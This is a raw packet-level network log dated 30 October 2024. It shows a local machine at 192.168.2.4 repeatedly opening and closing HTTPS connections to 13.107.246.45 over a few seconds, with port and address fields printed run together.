Oct 30, 2024 03:47:05.662406921 CET49937443192.168.2.413.107.246.45
Oct 30, 2024 03:47:05.663305044 CET49937443192.168.2.413.107.246.45
Oct 30, 2024 03:47:05.663325071 CET4434993713.107.246.45192.168.2.4
Oct 30, 2024 03:47:05.663336039 CET49937443192.168.2.413.107.246.45
Oct 30, 2024 03:47:05.663341999 CET4434993713.107.246.45192.168.2.4
Oct 30, 2024 03:47:05.666338921 CET49941443192.168.2.413.107.246.45
Oct 30, 2024 03:47:05.666388035 CET4434994113.107.246.45192.168.2.4
Oct 30, 2024 03:47:05.666593075 CET49941443192.168.2.413.107.246.45
Oct 30, 2024 03:47:05.666778088 CET49941443192.168.2.413.107.246.45
Oct 30, 2024 03:47:05.666795015 CET4434994113.107.246.45192.168.2.4
Oct 30, 2024 03:47:05.690836906 CET4434993913.107.246.45192.168.2.4
Oct 30, 2024 03:47:05.691987038 CET49939443192.168.2.413.107.246.45
Oct 30, 2024 03:47:05.691998005 CET4434993913.107.246.45192.168.2.4
Oct 30, 2024 03:47:05.692086935 CET4434993813.107.246.45192.168.2.4
Oct 30, 2024 03:47:05.692226887 CET4434993813.107.246.45192.168.2.4
Oct 30, 2024 03:47:05.692334890 CET49938443192.168.2.413.107.246.45
Oct 30, 2024 03:47:05.692485094 CET49938443192.168.2.413.107.246.45
Oct 30, 2024 03:47:05.692503929 CET4434993813.107.246.45192.168.2.4
Oct 30, 2024 03:47:05.692517996 CET49938443192.168.2.413.107.246.45
Oct 30, 2024 03:47:05.692523956 CET49939443192.168.2.413.107.246.45
Oct 30, 2024 03:47:05.692524910 CET4434993813.107.246.45192.168.2.4
Oct 30, 2024 03:47:05.692531109 CET4434993913.107.246.45192.168.2.4
Oct 30, 2024 03:47:05.695836067 CET4434993613.107.246.45192.168.2.4
Oct 30, 2024 03:47:05.695925951 CET4434993613.107.246.45192.168.2.4
Oct 30, 2024 03:47:05.695997953 CET49936443192.168.2.413.107.246.45
Oct 30, 2024 03:47:05.696194887 CET49936443192.168.2.413.107.246.45
Oct 30, 2024 03:47:05.696202040 CET4434993613.107.246.45192.168.2.4
Oct 30, 2024 03:47:05.697091103 CET49942443192.168.2.413.107.246.45
Oct 30, 2024 03:47:05.697125912 CET4434994213.107.246.45192.168.2.4
Oct 30, 2024 03:47:05.697272062 CET49942443192.168.2.413.107.246.45
Oct 30, 2024 03:47:05.697633982 CET49942443192.168.2.413.107.246.45
Oct 30, 2024 03:47:05.697649002 CET4434994213.107.246.45192.168.2.4
Oct 30, 2024 03:47:05.699199915 CET49943443192.168.2.413.107.246.45
Oct 30, 2024 03:47:05.699224949 CET4434994313.107.246.45192.168.2.4
Oct 30, 2024 03:47:05.699300051 CET49943443192.168.2.413.107.246.45
Oct 30, 2024 03:47:05.699420929 CET49943443192.168.2.413.107.246.45
Oct 30, 2024 03:47:05.699435949 CET4434994313.107.246.45192.168.2.4
Oct 30, 2024 03:47:05.820137024 CET4434993913.107.246.45192.168.2.4
Oct 30, 2024 03:47:05.820153952 CET4434993913.107.246.45192.168.2.4
Oct 30, 2024 03:47:05.820209980 CET49939443192.168.2.413.107.246.45
Oct 30, 2024 03:47:05.820219994 CET4434993913.107.246.45192.168.2.4
Oct 30, 2024 03:47:05.820288897 CET4434993913.107.246.45192.168.2.4
Oct 30, 2024 03:47:05.820472002 CET49939443192.168.2.413.107.246.45
Oct 30, 2024 03:47:05.820482016 CET4434993913.107.246.45192.168.2.4
Oct 30, 2024 03:47:05.820493937 CET49939443192.168.2.413.107.246.45
Oct 30, 2024 03:47:05.820498943 CET4434993913.107.246.45192.168.2.4
Oct 30, 2024 03:47:05.820506096 CET49939443192.168.2.413.107.246.45
Oct 30, 2024 03:47:05.820511103 CET4434993913.107.246.45192.168.2.4
Oct 30, 2024 03:47:05.824098110 CET49944443192.168.2.413.107.246.45
Oct 30, 2024 03:47:05.824129105 CET4434994413.107.246.45192.168.2.4
Oct 30, 2024 03:47:05.824204922 CET49944443192.168.2.413.107.246.45
Oct 30, 2024 03:47:05.824352026 CET49944443192.168.2.413.107.246.45
Oct 30, 2024 03:47:05.824366093 CET4434994413.107.246.45192.168.2.4
Oct 30, 2024 03:47:06.238188982 CET4434994013.107.246.45192.168.2.4
Oct 30, 2024 03:47:06.238831997 CET49940443192.168.2.413.107.246.45
Oct 30, 2024 03:47:06.238846064 CET4434994013.107.246.45192.168.2.4
Oct 30, 2024 03:47:06.239458084 CET49940443192.168.2.413.107.246.45
Oct 30, 2024 03:47:06.239463091 CET4434994013.107.246.45192.168.2.4
Oct 30, 2024 03:47:06.391427994 CET4434994013.107.246.45192.168.2.4
Oct 30, 2024 03:47:06.391458988 CET4434994013.107.246.45192.168.2.4
Oct 30, 2024 03:47:06.391521931 CET49940443192.168.2.413.107.246.45
Oct 30, 2024 03:47:06.391535044 CET4434994013.107.246.45192.168.2.4
Oct 30, 2024 03:47:06.391627073 CET4434994013.107.246.45192.168.2.4
Oct 30, 2024 03:47:06.391695976 CET49940443192.168.2.413.107.246.45
Oct 30, 2024 03:47:06.391848087 CET49940443192.168.2.413.107.246.45
Oct 30, 2024 03:47:06.391856909 CET4434994013.107.246.45192.168.2.4
Oct 30, 2024 03:47:06.391879082 CET49940443192.168.2.413.107.246.45
Oct 30, 2024 03:47:06.391882896 CET4434994013.107.246.45192.168.2.4
Oct 30, 2024 03:47:06.395569086 CET49945443192.168.2.413.107.246.45
Oct 30, 2024 03:47:06.395602942 CET4434994513.107.246.45192.168.2.4
Oct 30, 2024 03:47:06.395678043 CET49945443192.168.2.413.107.246.45
Oct 30, 2024 03:47:06.395821095 CET49945443192.168.2.413.107.246.45
Oct 30, 2024 03:47:06.395832062 CET4434994513.107.246.45192.168.2.4
Oct 30, 2024 03:47:06.426600933 CET4434994213.107.246.45192.168.2.4
Oct 30, 2024 03:47:06.427819014 CET4434994113.107.246.45192.168.2.4
Oct 30, 2024 03:47:06.427867889 CET49942443192.168.2.413.107.246.45
Oct 30, 2024 03:47:06.427884102 CET4434994213.107.246.45192.168.2.4
Oct 30, 2024 03:47:06.428288937 CET49942443192.168.2.413.107.246.45
Oct 30, 2024 03:47:06.428292990 CET4434994213.107.246.45192.168.2.4
Oct 30, 2024 03:47:06.428620100 CET49941443192.168.2.413.107.246.45
Oct 30, 2024 03:47:06.428652048 CET4434994113.107.246.45192.168.2.4
Oct 30, 2024 03:47:06.428975105 CET49941443192.168.2.413.107.246.45
Oct 30, 2024 03:47:06.428982973 CET4434994113.107.246.45192.168.2.4
Oct 30, 2024 03:47:06.479089022 CET4434994313.107.246.45192.168.2.4
Oct 30, 2024 03:47:06.479696035 CET49943443192.168.2.413.107.246.45
Oct 30, 2024 03:47:06.479712009 CET4434994313.107.246.45192.168.2.4
Oct 30, 2024 03:47:06.480321884 CET49943443192.168.2.413.107.246.45
Oct 30, 2024 03:47:06.480329037 CET4434994313.107.246.45192.168.2.4
Oct 30, 2024 03:47:06.555244923 CET4434994213.107.246.45192.168.2.4
Oct 30, 2024 03:47:06.555377960 CET4434994213.107.246.45192.168.2.4
Oct 30, 2024 03:47:06.555557966 CET49942443192.168.2.413.107.246.45
Oct 30, 2024 03:47:06.555622101 CET49942443192.168.2.413.107.246.45
Oct 30, 2024 03:47:06.555635929 CET4434994213.107.246.45192.168.2.4
Oct 30, 2024 03:47:06.555645943 CET49942443192.168.2.413.107.246.45
Oct 30, 2024 03:47:06.555651903 CET4434994213.107.246.45192.168.2.4
Oct 30, 2024 03:47:06.558681011 CET49946443192.168.2.413.107.246.45
Oct 30, 2024 03:47:06.558757067 CET4434994613.107.246.45192.168.2.4
Oct 30, 2024 03:47:06.558851957 CET49946443192.168.2.413.107.246.45
Oct 30, 2024 03:47:06.559073925 CET49946443192.168.2.413.107.246.45
Oct 30, 2024 03:47:06.559108019 CET4434994613.107.246.45192.168.2.4
Oct 30, 2024 03:47:06.559201956 CET4434994413.107.246.45192.168.2.4
Oct 30, 2024 03:47:06.559672117 CET49944443192.168.2.413.107.246.45
Oct 30, 2024 03:47:06.559690952 CET4434994413.107.246.45192.168.2.4
Oct 30, 2024 03:47:06.560103893 CET49944443192.168.2.413.107.246.45
Oct 30, 2024 03:47:06.560115099 CET4434994413.107.246.45192.168.2.4
Oct 30, 2024 03:47:06.563457966 CET4434994113.107.246.45192.168.2.4
Oct 30, 2024 03:47:06.563484907 CET4434994113.107.246.45192.168.2.4
Oct 30, 2024 03:47:06.563524961 CET49941443192.168.2.413.107.246.45
Oct 30, 2024 03:47:06.563529015 CET4434994113.107.246.45192.168.2.4
Oct 30, 2024 03:47:06.563707113 CET49941443192.168.2.413.107.246.45
Oct 30, 2024 03:47:06.563788891 CET49941443192.168.2.413.107.246.45
Oct 30, 2024 03:47:06.563808918 CET4434994113.107.246.45192.168.2.4
Oct 30, 2024 03:47:06.563823938 CET49941443192.168.2.413.107.246.45
Oct 30, 2024 03:47:06.563832998 CET4434994113.107.246.45192.168.2.4
Oct 30, 2024 03:47:06.566283941 CET49947443192.168.2.413.107.246.45
Oct 30, 2024 03:47:06.566318035 CET4434994713.107.246.45192.168.2.4
Oct 30, 2024 03:47:06.566450119 CET49947443192.168.2.413.107.246.45
Oct 30, 2024 03:47:06.566596985 CET49947443192.168.2.413.107.246.45
Oct 30, 2024 03:47:06.566612959 CET4434994713.107.246.45192.168.2.4
Oct 30, 2024 03:47:06.610816002 CET4434994313.107.246.45192.168.2.4
Oct 30, 2024 03:47:06.610889912 CET4434994313.107.246.45192.168.2.4
Oct 30, 2024 03:47:06.610954046 CET49943443192.168.2.413.107.246.45
Oct 30, 2024 03:47:06.610975027 CET4434994313.107.246.45192.168.2.4
Oct 30, 2024 03:47:06.611007929 CET4434994313.107.246.45192.168.2.4
Oct 30, 2024 03:47:06.611077070 CET49943443192.168.2.413.107.246.45
Oct 30, 2024 03:47:06.611175060 CET49943443192.168.2.413.107.246.45
Oct 30, 2024 03:47:06.611187935 CET4434994313.107.246.45192.168.2.4
Oct 30, 2024 03:47:06.611202002 CET49943443192.168.2.413.107.246.45
Oct 30, 2024 03:47:06.611207962 CET4434994313.107.246.45192.168.2.4
Oct 30, 2024 03:47:06.614377975 CET49948443192.168.2.413.107.246.45
Oct 30, 2024 03:47:06.614406109 CET4434994813.107.246.45192.168.2.4
Oct 30, 2024 03:47:06.614470959 CET49948443192.168.2.413.107.246.45
Oct 30, 2024 03:47:06.614643097 CET49948443192.168.2.413.107.246.45
Oct 30, 2024 03:47:06.614655018 CET4434994813.107.246.45192.168.2.4
Oct 30, 2024 03:47:06.709606886 CET4434994413.107.246.45192.168.2.4
Oct 30, 2024 03:47:06.709667921 CET4434994413.107.246.45192.168.2.4
Oct 30, 2024 03:47:06.709736109 CET49944443192.168.2.413.107.246.45
Oct 30, 2024 03:47:06.709964991 CET49944443192.168.2.413.107.246.45
Oct 30, 2024 03:47:06.709981918 CET4434994413.107.246.45192.168.2.4
Oct 30, 2024 03:47:06.709995031 CET49944443192.168.2.413.107.246.45
Oct 30, 2024 03:47:06.710000992 CET4434994413.107.246.45192.168.2.4
Oct 30, 2024 03:47:06.712831020 CET49949443192.168.2.413.107.246.45
Oct 30, 2024 03:47:06.712877035 CET4434994913.107.246.45192.168.2.4
Oct 30, 2024 03:47:06.713037968 CET49949443192.168.2.413.107.246.45
Oct 30, 2024 03:47:06.713105917 CET49949443192.168.2.413.107.246.45
Oct 30, 2024 03:47:06.713112116 CET4434994913.107.246.45192.168.2.4
Oct 30, 2024 03:47:07.142251968 CET4434994513.107.246.45192.168.2.4
Oct 30, 2024 03:47:07.142782927 CET49945443192.168.2.413.107.246.45
Oct 30, 2024 03:47:07.142802000 CET4434994513.107.246.45192.168.2.4
Oct 30, 2024 03:47:07.143382072 CET49945443192.168.2.413.107.246.45
Oct 30, 2024 03:47:07.143389940 CET4434994513.107.246.45192.168.2.4
Oct 30, 2024 03:47:07.276068926 CET4434994513.107.246.45192.168.2.4
Oct 30, 2024 03:47:07.276102066 CET4434994513.107.246.45192.168.2.4
Oct 30, 2024 03:47:07.276161909 CET4434994513.107.246.45192.168.2.4
Oct 30, 2024 03:47:07.276182890 CET49945443192.168.2.413.107.246.45
Oct 30, 2024 03:47:07.276216984 CET49945443192.168.2.413.107.246.45
Oct 30, 2024 03:47:07.276484966 CET49945443192.168.2.413.107.246.45
Oct 30, 2024 03:47:07.276501894 CET4434994513.107.246.45192.168.2.4
Oct 30, 2024 03:47:07.276515961 CET49945443192.168.2.413.107.246.45
Oct 30, 2024 03:47:07.276521921 CET4434994513.107.246.45192.168.2.4
Oct 30, 2024 03:47:07.279661894 CET49950443192.168.2.413.107.246.45
Oct 30, 2024 03:47:07.279706955 CET4434995013.107.246.45192.168.2.4
Oct 30, 2024 03:47:07.279794931 CET49950443192.168.2.413.107.246.45
Oct 30, 2024 03:47:07.280010939 CET49950443192.168.2.413.107.246.45
Oct 30, 2024 03:47:07.280025005 CET4434995013.107.246.45192.168.2.4
Oct 30, 2024 03:47:07.301364899 CET4434994613.107.246.45192.168.2.4
Oct 30, 2024 03:47:07.302293062 CET49946443192.168.2.413.107.246.45
Oct 30, 2024 03:47:07.302340984 CET4434994613.107.246.45192.168.2.4
Oct 30, 2024 03:47:07.302943945 CET49946443192.168.2.413.107.246.45
Oct 30, 2024 03:47:07.302958965 CET4434994613.107.246.45192.168.2.4
Oct 30, 2024 03:47:07.309923887 CET4434994713.107.246.45192.168.2.4
Oct 30, 2024 03:47:07.310312033 CET49947443192.168.2.413.107.246.45
Oct 30, 2024 03:47:07.310345888 CET4434994713.107.246.45192.168.2.4
Oct 30, 2024 03:47:07.310672998 CET49947443192.168.2.413.107.246.45
Oct 30, 2024 03:47:07.310682058 CET4434994713.107.246.45192.168.2.4
Oct 30, 2024 03:47:07.368638992 CET4434994813.107.246.45192.168.2.4
Oct 30, 2024 03:47:07.369307995 CET49948443192.168.2.413.107.246.45
Oct 30, 2024 03:47:07.369330883 CET4434994813.107.246.45192.168.2.4
Oct 30, 2024 03:47:07.369680882 CET49948443192.168.2.413.107.246.45
Oct 30, 2024 03:47:07.369685888 CET4434994813.107.246.45192.168.2.4
Oct 30, 2024 03:47:07.434056997 CET4434994613.107.246.45192.168.2.4
Oct 30, 2024 03:47:07.434222937 CET4434994613.107.246.45192.168.2.4
Oct 30, 2024 03:47:07.434318066 CET49946443192.168.2.413.107.246.45
Oct 30, 2024 03:47:07.434461117 CET49946443192.168.2.413.107.246.45
Oct 30, 2024 03:47:07.434518099 CET4434994613.107.246.45192.168.2.4
Oct 30, 2024 03:47:07.434552908 CET49946443192.168.2.413.107.246.45
Oct 30, 2024 03:47:07.434570074 CET4434994613.107.246.45192.168.2.4
Oct 30, 2024 03:47:07.437736034 CET49951443192.168.2.413.107.246.45
Oct 30, 2024 03:47:07.437771082 CET4434995113.107.246.45192.168.2.4
Oct 30, 2024 03:47:07.437869072 CET49951443192.168.2.413.107.246.45
Oct 30, 2024 03:47:07.438070059 CET49951443192.168.2.413.107.246.45
Oct 30, 2024 03:47:07.438086987 CET4434995113.107.246.45192.168.2.4
Oct 30, 2024 03:47:07.449439049 CET4434994713.107.246.45192.168.2.4
Oct 30, 2024 03:47:07.449475050 CET4434994713.107.246.45192.168.2.4
Oct 30, 2024 03:47:07.449517012 CET4434994713.107.246.45192.168.2.4
Oct 30, 2024 03:47:07.449527025 CET49947443192.168.2.413.107.246.45
Oct 30, 2024 03:47:07.449562073 CET49947443192.168.2.413.107.246.45
Oct 30, 2024 03:47:07.449748039 CET49947443192.168.2.413.107.246.45
Oct 30, 2024 03:47:07.449760914 CET4434994713.107.246.45192.168.2.4
Oct 30, 2024 03:47:07.449773073 CET49947443192.168.2.413.107.246.45
Oct 30, 2024 03:47:07.449779034 CET4434994713.107.246.45192.168.2.4
Oct 30, 2024 03:47:07.452090979 CET49952443192.168.2.413.107.246.45
Oct 30, 2024 03:47:07.452131033 CET4434995213.107.246.45192.168.2.4
Oct 30, 2024 03:47:07.452225924 CET49952443192.168.2.413.107.246.45
Oct 30, 2024 03:47:07.452394962 CET49952443192.168.2.413.107.246.45
Oct 30, 2024 03:47:07.452411890 CET4434995213.107.246.45192.168.2.4
Oct 30, 2024 03:47:07.454134941 CET4434994913.107.246.45192.168.2.4
Oct 30, 2024 03:47:07.454504013 CET49949443192.168.2.413.107.246.45
Oct 30, 2024 03:47:07.454514980 CET4434994913.107.246.45192.168.2.4
Oct 30, 2024 03:47:07.454904079 CET49949443192.168.2.413.107.246.45
Oct 30, 2024 03:47:07.454910994 CET4434994913.107.246.45192.168.2.4
Oct 30, 2024 03:47:07.511920929 CET4434994813.107.246.45192.168.2.4
Oct 30, 2024 03:47:07.512078047 CET4434994813.107.246.45192.168.2.4
Oct 30, 2024 03:47:07.512147903 CET49948443192.168.2.413.107.246.45
Oct 30, 2024 03:47:07.512293100 CET49948443192.168.2.413.107.246.45
Oct 30, 2024 03:47:07.512305021 CET4434994813.107.246.45192.168.2.4
Oct 30, 2024 03:47:07.512315035 CET49948443192.168.2.413.107.246.45
Oct 30, 2024 03:47:07.512320995 CET4434994813.107.246.45192.168.2.4
Oct 30, 2024 03:47:07.515208006 CET49953443192.168.2.413.107.246.45
Oct 30, 2024 03:47:07.515235901 CET4434995313.107.246.45192.168.2.4
Oct 30, 2024 03:47:07.515307903 CET49953443192.168.2.413.107.246.45
Oct 30, 2024 03:47:07.515574932 CET49953443192.168.2.413.107.246.45
Oct 30, 2024 03:47:07.515587091 CET4434995313.107.246.45192.168.2.4
Oct 30, 2024 03:47:07.588346958 CET4434994913.107.246.45192.168.2.4
Oct 30, 2024 03:47:07.588368893 CET4434994913.107.246.45192.168.2.4
Oct 30, 2024 03:47:07.588407040 CET4434994913.107.246.45192.168.2.4
Oct 30, 2024 03:47:07.588428020 CET49949443192.168.2.413.107.246.45
Oct 30, 2024 03:47:07.588495016 CET49949443192.168.2.413.107.246.45
Oct 30, 2024 03:47:07.588840961 CET49949443192.168.2.413.107.246.45
Oct 30, 2024 03:47:07.588867903 CET4434994913.107.246.45192.168.2.4
Oct 30, 2024 03:47:07.588887930 CET49949443192.168.2.413.107.246.45
Oct 30, 2024 03:47:07.588895082 CET4434994913.107.246.45192.168.2.4
Oct 30, 2024 03:47:07.591985941 CET49954443192.168.2.413.107.246.45
Oct 30, 2024 03:47:07.592012882 CET4434995413.107.246.45192.168.2.4
Oct 30, 2024 03:47:07.592148066 CET49954443192.168.2.413.107.246.45
Oct 30, 2024 03:47:07.592430115 CET49954443192.168.2.413.107.246.45
Oct 30, 2024 03:47:07.592448950 CET4434995413.107.246.45192.168.2.4
Oct 30, 2024 03:47:08.024312973 CET4434995013.107.246.45192.168.2.4
Oct 30, 2024 03:47:08.028055906 CET49950443192.168.2.413.107.246.45
Oct 30, 2024 03:47:08.028074980 CET4434995013.107.246.45192.168.2.4
Oct 30, 2024 03:47:08.028518915 CET49950443192.168.2.413.107.246.45
Oct 30, 2024 03:47:08.028523922 CET4434995013.107.246.45192.168.2.4
Oct 30, 2024 03:47:08.167299032 CET4434995013.107.246.45192.168.2.4
Oct 30, 2024 03:47:08.167414904 CET4434995013.107.246.45192.168.2.4
Oct 30, 2024 03:47:08.167579889 CET49950443192.168.2.413.107.246.45
Oct 30, 2024 03:47:08.167764902 CET49950443192.168.2.413.107.246.45
Oct 30, 2024 03:47:08.167777061 CET4434995013.107.246.45192.168.2.4
Oct 30, 2024 03:47:08.167788029 CET49950443192.168.2.413.107.246.45
Oct 30, 2024 03:47:08.167792082 CET4434995013.107.246.45192.168.2.4
Oct 30, 2024 03:47:08.170870066 CET4434995213.107.246.45192.168.2.4
Oct 30, 2024 03:47:08.171093941 CET49955443192.168.2.413.107.246.45
Oct 30, 2024 03:47:08.171125889 CET4434995513.107.246.45192.168.2.4
Oct 30, 2024 03:47:08.171475887 CET49952443192.168.2.413.107.246.45
Oct 30, 2024 03:47:08.171494007 CET4434995213.107.246.45192.168.2.4
Oct 30, 2024 03:47:08.171528101 CET49955443192.168.2.413.107.246.45
Oct 30, 2024 03:47:08.171646118 CET49955443192.168.2.413.107.246.45
Oct 30, 2024 03:47:08.171653986 CET4434995513.107.246.45192.168.2.4
Oct 30, 2024 03:47:08.172143936 CET49952443192.168.2.413.107.246.45
Oct 30, 2024 03:47:08.172152042 CET4434995213.107.246.45192.168.2.4
Oct 30, 2024 03:47:08.175914049 CET4434995113.107.246.45192.168.2.4
Oct 30, 2024 03:47:08.176383018 CET49951443192.168.2.413.107.246.45
Oct 30, 2024 03:47:08.176399946 CET4434995113.107.246.45192.168.2.4
Oct 30, 2024 03:47:08.176769972 CET49951443192.168.2.413.107.246.45
Oct 30, 2024 03:47:08.176774979 CET4434995113.107.246.45192.168.2.4
Oct 30, 2024 03:47:08.253051043 CET4434995313.107.246.45192.168.2.4
Oct 30, 2024 03:47:08.253817081 CET49953443192.168.2.413.107.246.45
Oct 30, 2024 03:47:08.253828049 CET4434995313.107.246.45192.168.2.4
Oct 30, 2024 03:47:08.254440069 CET49953443192.168.2.413.107.246.45
Oct 30, 2024 03:47:08.254445076 CET4434995313.107.246.45192.168.2.4
Oct 30, 2024 03:47:08.299565077 CET4434995213.107.246.45192.168.2.4
Oct 30, 2024 03:47:08.299658060 CET4434995213.107.246.45192.168.2.4
Oct 30, 2024 03:47:08.299699068 CET4434995213.107.246.45192.168.2.4
Oct 30, 2024 03:47:08.299748898 CET49952443192.168.2.413.107.246.45
Oct 30, 2024 03:47:08.299797058 CET49952443192.168.2.413.107.246.45
Oct 30, 2024 03:47:08.299985886 CET49952443192.168.2.413.107.246.45
Oct 30, 2024 03:47:08.300004959 CET4434995213.107.246.45192.168.2.4
Oct 30, 2024 03:47:08.300020933 CET49952443192.168.2.413.107.246.45
Oct 30, 2024 03:47:08.300028086 CET4434995213.107.246.45192.168.2.4
Oct 30, 2024 03:47:08.302391052 CET49956443192.168.2.413.107.246.45
Oct 30, 2024 03:47:08.302416086 CET4434995613.107.246.45192.168.2.4
Oct 30, 2024 03:47:08.302520990 CET49956443192.168.2.413.107.246.45
Oct 30, 2024 03:47:08.302674055 CET49956443192.168.2.413.107.246.45
Oct 30, 2024 03:47:08.302690029 CET4434995613.107.246.45192.168.2.4
Oct 30, 2024 03:47:08.306879044 CET4434995113.107.246.45192.168.2.4
Oct 30, 2024 03:47:08.307053089 CET4434995113.107.246.45192.168.2.4
Oct 30, 2024 03:47:08.307135105 CET49951443192.168.2.413.107.246.45
Oct 30, 2024 03:47:08.307317972 CET49951443192.168.2.413.107.246.45
Oct 30, 2024 03:47:08.307328939 CET4434995113.107.246.45192.168.2.4
Oct 30, 2024 03:47:08.307347059 CET49951443192.168.2.413.107.246.45
Oct 30, 2024 03:47:08.307353973 CET4434995113.107.246.45192.168.2.4
Oct 30, 2024 03:47:08.309334040 CET49957443192.168.2.413.107.246.45
Oct 30, 2024 03:47:08.309374094 CET4434995713.107.246.45192.168.2.4
Oct 30, 2024 03:47:08.309444904 CET49957443192.168.2.413.107.246.45
Oct 30, 2024 03:47:08.309556961 CET49957443192.168.2.413.107.246.45
Oct 30, 2024 03:47:08.309571028 CET4434995713.107.246.45192.168.2.4
Oct 30, 2024 03:47:08.320678949 CET4434995413.107.246.45192.168.2.4
Oct 30, 2024 03:47:08.323858023 CET49954443192.168.2.413.107.246.45
Oct 30, 2024 03:47:08.323868036 CET4434995413.107.246.45192.168.2.4
Oct 30, 2024 03:47:08.324279070 CET49954443192.168.2.413.107.246.45
Oct 30, 2024 03:47:08.324284077 CET4434995413.107.246.45192.168.2.4
Oct 30, 2024 03:47:08.380178928 CET4434995313.107.246.45192.168.2.4
Oct 30, 2024 03:47:08.380537033 CET4434995313.107.246.45192.168.2.4
Oct 30, 2024 03:47:08.380605936 CET49953443192.168.2.413.107.246.45
Oct 30, 2024 03:47:08.380633116 CET49953443192.168.2.413.107.246.45
Oct 30, 2024 03:47:08.380641937 CET4434995313.107.246.45192.168.2.4
Oct 30, 2024 03:47:08.380678892 CET49953443192.168.2.413.107.246.45
Oct 30, 2024 03:47:08.380683899 CET4434995313.107.246.45192.168.2.4
Oct 30, 2024 03:47:08.383946896 CET49958443192.168.2.413.107.246.45
Oct 30, 2024 03:47:08.383979082 CET4434995813.107.246.45192.168.2.4
Oct 30, 2024 03:47:08.384071112 CET49958443192.168.2.413.107.246.45
Oct 30, 2024 03:47:08.384232998 CET49958443192.168.2.413.107.246.45
Oct 30, 2024 03:47:08.384244919 CET4434995813.107.246.45192.168.2.4
Oct 30, 2024 03:47:08.449891090 CET4434995413.107.246.45192.168.2.4
Oct 30, 2024 03:47:08.449969053 CET4434995413.107.246.45192.168.2.4
Oct 30, 2024 03:47:08.450009108 CET49954443192.168.2.413.107.246.45
Oct 30, 2024 03:47:08.450196981 CET49954443192.168.2.413.107.246.45
Oct 30, 2024 03:47:08.450205088 CET4434995413.107.246.45192.168.2.4
Oct 30, 2024 03:47:08.450218916 CET49954443192.168.2.413.107.246.45
Oct 30, 2024 03:47:08.450223923 CET4434995413.107.246.45192.168.2.4
Oct 30, 2024 03:47:08.453213930 CET49959443192.168.2.413.107.246.45
Oct 30, 2024 03:47:08.453284025 CET4434995913.107.246.45192.168.2.4
Oct 30, 2024 03:47:08.453350067 CET49959443192.168.2.413.107.246.45
Oct 30, 2024 03:47:08.453561068 CET49959443192.168.2.413.107.246.45
Oct 30, 2024 03:47:08.453577995 CET4434995913.107.246.45192.168.2.4
Oct 30, 2024 03:47:08.903353930 CET4434995513.107.246.45192.168.2.4
Oct 30, 2024 03:47:08.903918028 CET49955443192.168.2.413.107.246.45
Oct 30, 2024 03:47:08.903943062 CET4434995513.107.246.45192.168.2.4
Oct 30, 2024 03:47:08.904390097 CET49955443192.168.2.413.107.246.45
Oct 30, 2024 03:47:08.904397011 CET4434995513.107.246.45192.168.2.4
Oct 30, 2024 03:47:09.030925989 CET4434995713.107.246.45192.168.2.4
Oct 30, 2024 03:47:09.031626940 CET49957443192.168.2.413.107.246.45
Oct 30, 2024 03:47:09.031670094 CET4434995713.107.246.45192.168.2.4
Oct 30, 2024 03:47:09.032228947 CET49957443192.168.2.413.107.246.45
Oct 30, 2024 03:47:09.032243013 CET4434995713.107.246.45192.168.2.4
Oct 30, 2024 03:47:09.034495115 CET4434995513.107.246.45192.168.2.4
Oct 30, 2024 03:47:09.034594059 CET4434995513.107.246.45192.168.2.4
Oct 30, 2024 03:47:09.034636974 CET49955443192.168.2.413.107.246.45
Oct 30, 2024 03:47:09.034651995 CET4434995513.107.246.45192.168.2.4
Oct 30, 2024 03:47:09.034677982 CET4434995513.107.246.45192.168.2.4
Oct 30, 2024 03:47:09.034733057 CET49955443192.168.2.413.107.246.45
Oct 30, 2024 03:47:09.034770966 CET49955443192.168.2.413.107.246.45
Oct 30, 2024 03:47:09.034780025 CET4434995513.107.246.45192.168.2.4
Oct 30, 2024 03:47:09.034790993 CET49955443192.168.2.413.107.246.45
Oct 30, 2024 03:47:09.034795046 CET4434995513.107.246.45192.168.2.4
Oct 30, 2024 03:47:09.038005114 CET49960443192.168.2.413.107.246.45
Oct 30, 2024 03:47:09.038084984 CET4434996013.107.246.45192.168.2.4
Oct 30, 2024 03:47:09.038193941 CET49960443192.168.2.413.107.246.45
Oct 30, 2024 03:47:09.038362026 CET49960443192.168.2.413.107.246.45
Oct 30, 2024 03:47:09.038394928 CET4434996013.107.246.45192.168.2.4
Oct 30, 2024 03:47:09.042309046 CET4434995613.107.246.45192.168.2.4
Oct 30, 2024 03:47:09.042736053 CET49956443192.168.2.413.107.246.45
Oct 30, 2024 03:47:09.042753935 CET4434995613.107.246.45192.168.2.4
Oct 30, 2024 03:47:09.043375969 CET49956443192.168.2.413.107.246.45
Oct 30, 2024 03:47:09.043380976 CET4434995613.107.246.45192.168.2.4
Oct 30, 2024 03:47:09.131159067 CET4434995813.107.246.45192.168.2.4
Oct 30, 2024 03:47:09.131818056 CET49958443192.168.2.413.107.246.45
Oct 30, 2024 03:47:09.131834984 CET4434995813.107.246.45192.168.2.4
Oct 30, 2024 03:47:09.132405996 CET49958443192.168.2.413.107.246.45
Oct 30, 2024 03:47:09.132411003 CET4434995813.107.246.45192.168.2.4
Oct 30, 2024 03:47:09.169245958 CET4434995713.107.246.45192.168.2.4
Oct 30, 2024 03:47:09.169285059 CET4434995713.107.246.45192.168.2.4
Oct 30, 2024 03:47:09.169333935 CET4434995713.107.246.45192.168.2.4
Oct 30, 2024 03:47:09.169333935 CET49957443192.168.2.413.107.246.45
Oct 30, 2024 03:47:09.169385910 CET49957443192.168.2.413.107.246.45
Oct 30, 2024 03:47:09.169696093 CET49957443192.168.2.413.107.246.45
Oct 30, 2024 03:47:09.169713020 CET4434995713.107.246.45192.168.2.4
Oct 30, 2024 03:47:09.169733047 CET49957443192.168.2.413.107.246.45
Oct 30, 2024 03:47:09.169739962 CET4434995713.107.246.45192.168.2.4
Oct 30, 2024 03:47:09.173053980 CET49961443192.168.2.413.107.246.45
Oct 30, 2024 03:47:09.173106909 CET4434996113.107.246.45192.168.2.4
Oct 30, 2024 03:47:09.173192024 CET49961443192.168.2.413.107.246.45
Oct 30, 2024 03:47:09.173326969 CET49961443192.168.2.413.107.246.45
Oct 30, 2024 03:47:09.173337936 CET4434996113.107.246.45192.168.2.4
Oct 30, 2024 03:47:09.173664093 CET4434995913.107.246.45192.168.2.4
Oct 30, 2024 03:47:09.174179077 CET49959443192.168.2.413.107.246.45
Oct 30, 2024 03:47:09.174197912 CET4434995913.107.246.45192.168.2.4
Oct 30, 2024 03:47:09.174705029 CET49959443192.168.2.413.107.246.45
Oct 30, 2024 03:47:09.174710989 CET4434995913.107.246.45192.168.2.4
Oct 30, 2024 03:47:09.179728031 CET4434995613.107.246.45192.168.2.4
